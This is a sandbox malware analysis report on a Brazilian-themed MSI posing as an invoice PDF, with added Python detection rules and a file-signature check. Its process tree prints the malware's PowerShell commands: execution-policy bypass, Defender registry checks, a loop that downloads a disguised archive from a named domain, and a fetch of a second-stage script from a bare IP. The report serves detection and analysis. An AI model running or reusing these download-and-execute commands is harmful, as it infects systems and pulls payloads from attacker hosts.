Windows
Analysis Report
Fatura227Pendente576.pdf674.msi
Overview
General Information
Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Yara detected MalDoc
Yara detected Powershell download and execute
AI detected suspicious URL
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates files in the system32 config directory
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Suspicious MsiExec Embedding Parent
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
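The Sigma hits listed above (execution-policy bypass, a script interpreter started from a temp folder, Invoke-WebRequest against a bare IP, csc.exe compiling from a suspicious location, a script host spawned by msiexec -Embedding) each reduce to a check on one process-creation event. The Python below is an added example written for this page, not Joe Sandbox's or the Sigma project's own detection code; it encodes those checks as small rules and runs them over constructed process-creation events modeled on the command lines in the process tree further down (the PIDs and paths are copied from that tree, the benign control event and the exact rule thresholds are assumptions for this illustration).

```python
import re
from dataclasses import dataclass

# Added example: process-creation rules mirroring the Sigma hits in this report.
# Events are constructed for illustration; the field layout follows Sysmon EID 1 / Security 4688.


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str              # full path of the new process
    cmdline: str
    parent_image: str = ""
    parent_cmdline: str = ""


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Folders a script interpreter or compiler rarely has a legitimate reason to read from.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\temp\\", "\\users\\public\\")
POLICY_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass\b", re.I)
WEB_CMDLETS = re.compile(r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|downloadfile|downloadstring)\b", re.I)
DIRECT_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[/:'\"\s]|$)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_suspicious_dir(text: str) -> bool:
    low = text.lower()
    return any(d in low for d in SUSPICIOUS_DIRS)


def rule_policy_bypass(ev: ProcessEvent) -> bool:
    return basename(ev.image) in POWERSHELL and bool(POLICY_BYPASS.search(ev.cmdline))


def rule_script_from_suspicious_folder(ev: ProcessEvent) -> bool:
    return basename(ev.image) in SCRIPT_HOSTS and in_suspicious_dir(ev.cmdline)


def rule_web_download(ev: ProcessEvent) -> bool:
    return (basename(ev.image) in POWERSHELL
            and bool(WEB_CMDLETS.search(ev.cmdline))
            and "http" in ev.cmdline.lower())


def rule_webrequest_direct_ip(ev: ProcessEvent) -> bool:
    # A download cmdlet whose URL host is a literal IPv4 address rather than a name.
    return rule_web_download(ev) and bool(DIRECT_IP_URL.search(ev.cmdline))


def rule_csc_from_suspicious_location(ev: ProcessEvent) -> bool:
    return basename(ev.image) == "csc.exe" and in_suspicious_dir(ev.cmdline)


def rule_msiexec_embedding_parent(ev: ProcessEvent) -> bool:
    # msiexec started with -Embedding (the custom-action host) spawning a script host.
    return (basename(ev.parent_image) == "msiexec.exe"
            and "-embedding" in ev.parent_cmdline.lower()
            and basename(ev.image) in SCRIPT_HOSTS)


RULES = {
    "policy_bypass": rule_policy_bypass,
    "script_from_suspicious_folder": rule_script_from_suspicious_folder,
    "web_download": rule_web_download,
    "webrequest_direct_ip": rule_webrequest_direct_ip,
    "csc_from_suspicious_location": rule_csc_from_suspicious_location,
    "msiexec_embedding_parent": rule_msiexec_embedding_parent,
}


def evaluate(ev: ProcessEvent) -> list:
    """Names of the rules that fire for one event, in RULES order."""
    return [name for name, check in RULES.items() if check(ev)]


def triage(events) -> dict:
    """Map pid -> fired rule names, keeping only events that fired at least one rule."""
    hits = {}
    for ev in events:
        fired = evaluate(ev)
        if fired:
            hits[ev.pid] = fired
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events modeled on this report's process tree, plus one benign control (pid 4242 is made up).
SAMPLE_EVENTS = [
    ProcessEvent(1260, PS, r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss143.ps1"',
                 r"C:\Windows\syswow64\MsiExec.exe", r"C:\Windows\syswow64\MsiExec.exe -Embedding C85DA56207AAF23DFEFCC42BBFF0E5E4"),
    ProcessEvent(5516, PS, r'''PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://192.124.216.14/vd/sis/DownSistem.ps1' -OutFile 'C:\temp\DownSistem.ps1' -UseBasicParsing"''', PS, ""),
    ProcessEvent(7316, PS, r'''powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Invoke-WebRequest -Uri 'https://qsif-9432751-neurallink-bwlprtyx-099.computador-hardware.net/simples/rosa.png' -OutFile 'C:\LocalNow\rosa.png'"''', PS, ""),
    ProcessEvent(3716, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                 r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2xgfswae.cmdline"', PS, ""),
    ProcessEvent(4242, PS, r'powershell.exe -NoProfile -Command "Get-Service -Name BITS"', r"C:\Windows\explorer.exe", ""),
]

if __name__ == "__main__":
    for pid, fired in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(fired))
```

The rosa.png download (pid 7316) fires the generic web-download rule but not the direct-IP one, which is exactly the gap the domain-fronted second stage exploits; in a real pipeline the same event would be joined against the JA3 and IP reputation signals the report lists separately.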
Classification
- System is w10x64
- msiexec.exe (PID: 4548 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Fatura227Pendente576.pdf674.msi" MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 796 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 1440 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C85DA56207AAF23DFEFCC42BBFF0E5E4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- powershell.exe (PID: 1260 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss143.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7348 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss2970.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- chrome.exe (PID: 7468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://yqvn-6391824-metaflux-xytrmnwl-246.1mp3.org/fatura/fatura.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 7696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1956,i,12467281567636265380,10636997337395196544,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- powershell.exe (PID: 2000 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3FBB.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6944 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6568.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2724 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss8A88.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3396 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA5E4.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5024 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssD40C.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2656 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssB9B.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5436 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss4E65.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7812 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9AD3.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2596 cmdline: -NoProfile -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1297.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7180 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\temp\ShowUpdateScreen.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7584 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 6028 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& {
    $loopCompleted = $false
    for ($i = 0; $i -lt 3; $i++) {
        Start-Sleep -Seconds 60
        # Check the registry keys
        $keyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
        $disableAntiSpyware = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiSpyware' -ErrorAction SilentlyContinue).DisableAntiSpyware
        $disableAntiVirus = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiVirus' -ErrorAction SilentlyContinue).DisableAntiVirus
        # If either key is missing or not set to 1, leave the loop and mark it as completed
        if ($disableAntiSpyware -ne 1 -or $disableAntiVirus -ne 1) {
            $loopCompleted = $true
            break
        }
    }
    # If the loop was interrupted, run the scheduled task ATD
    if ($loopCompleted) {
        Start-ScheduledTask -TaskName 'ATD'
        Write-Output 'Tarefa agendada ATD executada com sucesso.'
    }
}" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7316 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& {
    $folderPath = 'C:\LocalNow'
    $fileUrl = 'https://qsif-9432751-neurallink-bwlprtyx-099.computador-hardware.net/simples/rosa.png'
    $downloadedFile = Join-Path $folderPath 'rosa.png'
    $zipFile = Join-Path $folderPath 'rosa.zip'
    $extractedFolder = Join-Path $folderPath 'Extracted'
    while ($true) {
        Start-Sleep -Seconds 60
        if (!(Test-Path -Path $folderPath)) {
            Write-Output 'Pasta LocalNow não encontrada. Aguardando nova verificação.'
            continue
        }
        # Check whether any DLL file exists in the folder
        $dllFiles = Get-ChildItem -Path $folderPath -Filter *.dll -Recurse -ErrorAction SilentlyContinue
        if ($dllFiles -and $dllFiles.Count -gt 0) {
            Write-Output 'Arquivo DLL encontrado: $($dllFiles[0].Name)'
            break # Leave the while loop
        }
        Write-Output 'Arquivo DLL não encontrado. Reiniciando o processo.'
        # Clean the folder before a new download
        try {
            Get-ChildItem -Path $folderPath -Recurse | Remove-Item -Force -Recurse -ErrorAction Stop
            # Download and extraction
            Invoke-WebRequest -Uri $fileUrl -OutFile $downloadedFile -ErrorAction Stop
            Rename-Item -Path $downloadedFile -NewName $zipFile -ErrorAction Stop
            Expand-Archive -Path $zipFile -DestinationPath $extractedFolder -Force -ErrorAction Stop
            Write-Output 'Processo de extração completado com sucesso.'
        } catch {
            Write-Output 'Erro durante o processo: $($_.Exception.Message)'
            Start-Sleep -Seconds 30 # Wait before trying again
        }
    }
    exit # End the script after leaving the loop
}" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4336 cmdline: PowerShell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\Executar01aa.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3812 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& {
    $folderPath = 'C:\LocalNow'
    $loopCompleted = $false
    for ($i = 0; $i -lt 3; $i++) {
        Start-Sleep -Seconds 60
        # Check the registry keys
        $keyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
        $disableAntiSpyware = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiSpyware' -ErrorAction SilentlyContinue).DisableAntiSpyware -eq 1
        $disableAntiVirus = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiVirus' -ErrorAction SilentlyContinue).DisableAntiVirus -eq 1
        # If both keys exist with value 1, leave the loop and mark it as completed
        if ($disableAntiSpyware -eq 1 -and $disableAntiVirus -eq 1) {
            $loopCompleted = $true
            break
        }
    }
    # If the loop was interrupted, check whether the folder already exists and create it if necessary
    if ($loopCompleted -and !(Test-Path -Path $folderPath)) {
        New-Item -ItemType Directory -Path $folderPath -Force
        Write-Output "Pasta C:\LocalNow criada com sucesso após o loop completar."
    }
}" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5516 cmdline: PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "
    if (-not (Test-Path 'C:\temp')) {
        New-Item -ItemType Directory -Path 'C:\temp' -Force | Out-Null
    }
    try {
        Invoke-WebRequest -Uri 'http://192.124.216.14/vd/sis/DownSistem.ps1' -OutFile 'C:\temp\DownSistem.ps1' -UseBasicParsing
        Write-Output 'Arquivo DownSistem.ps1 baixado com sucesso em C:\temp\DownSistem.ps1'
    } catch {
        Write-Output 'Erro ao baixar o arquivo DownSistem.ps1: '
        exit 1
    }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4948 cmdline: PowerShell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\temp\DownSistem.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6812 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\temp\ShowUpdateScreen.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- csc.exe (PID: 3716 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2xgfswae.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 3336 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7FB3.tmp" "c:\Users\user\AppData\Local\Temp\CSC1F1FEE1B60354EE49FE3D23A31B1244.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- powershell.exe (PID: 4464 cmdline: PowerShell.exe -NoProfile -ExecutionPolicy Bypass -File C:\temp\sistema.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 652 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "& {
    $loopCompleted = $false
    for ($i = 0; $i -lt 3; $i++) {
        Start-Sleep -Seconds 60
        # Check the registry keys
        $keyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
        $disableAntiSpyware = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiSpyware' -ErrorAction SilentlyContinue).DisableAntiSpyware
        $disableAntiVirus = (Get-ItemProperty -Path $keyPath -Name 'DisableAntiVirus' -ErrorAction SilentlyContinue).DisableAntiVirus
        # If either key is missing or not set to 1, leave the loop and mark it as completed
        if ($disableAntiSpyware -ne 1 -or $disableAntiVirus -ne 1) {
            $loopCompleted = $true
            break
        }
    }
    # If the loop was interrupted, run the scheduled task ATD
    if ($loopCompleted) {
        Start-ScheduledTask -TaskName 'ATD'
        Write-Output 'Tarefa agendada ATD executada com sucesso.'
    }
}" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
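The PID 7316 loop in the tree above fetches rosa.png, renames it to rosa.zip, expands it, and then waits for a .dll to appear under C:\LocalNow, so the image extension is only a disguise for an archive carrying a native payload. A responder triaging that download should trust the leading bytes rather than the name. The Python below is an added example for this page, not code from the sample or from Joe Sandbox; the archive it inspects is constructed in memory (a text file plus a 64-byte MZ stub named payload.dll) as a stand-in for the real rosa.zip, whose contents the report does not show.

```python
import io
import zipfile

# Added example: classify a dropped file by its magic bytes, not its extension.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")  # local header, empty archive, spanned
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif", "bmp"}


def sniff(data: bytes) -> str:
    """Return 'png', 'zip' or 'unknown' from the file signature alone."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(ZIP_MAGICS):
        return "zip"
    return "unknown"


def is_masquerading_archive(filename: str, data: bytes) -> bool:
    """True when the name claims an image but the bytes are a ZIP container."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in IMAGE_EXTS and sniff(data) == "zip"


def executable_members(data: bytes) -> list:
    """Names of archive members whose content begins with the PE 'MZ' header."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [info.filename for info in zf.infolist()
                if not info.is_dir() and zf.read(info)[:2] == b"MZ"]


def build_constructed_sample() -> bytes:
    """Constructed stand-in for rosa.png: a ZIP holding a text note and an MZ stub (not the real payload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("notes.txt", "constructed sample, not the real rosa.zip")
        zf.writestr("payload.dll", b"MZ" + b"\x00" * 62)  # hypothetical member name
    return buf.getvalue()


if __name__ == "__main__":
    blob = build_constructed_sample()
    print("rosa.png signature:", sniff(blob))
    print("masquerading archive:", is_masquerading_archive("rosa.png", blob))
    print("PE members:", executable_members(blob))
```

The same check belongs in a proxy or EDR file-download rule: an HTTP response whose Content-Type or URL says image but whose body starts with PK is the stage-two pattern this sample uses.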
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Source: | Author: Nasreddine Bencherchali (Nextron Systems)